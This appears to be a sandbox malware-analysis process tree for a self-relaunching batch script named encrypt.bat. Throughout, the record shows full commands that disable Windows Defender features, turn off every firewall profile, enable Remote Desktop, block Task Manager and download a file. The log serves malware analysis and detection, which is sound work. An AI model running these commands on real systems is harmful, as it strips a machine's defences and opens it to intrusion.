C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵
-
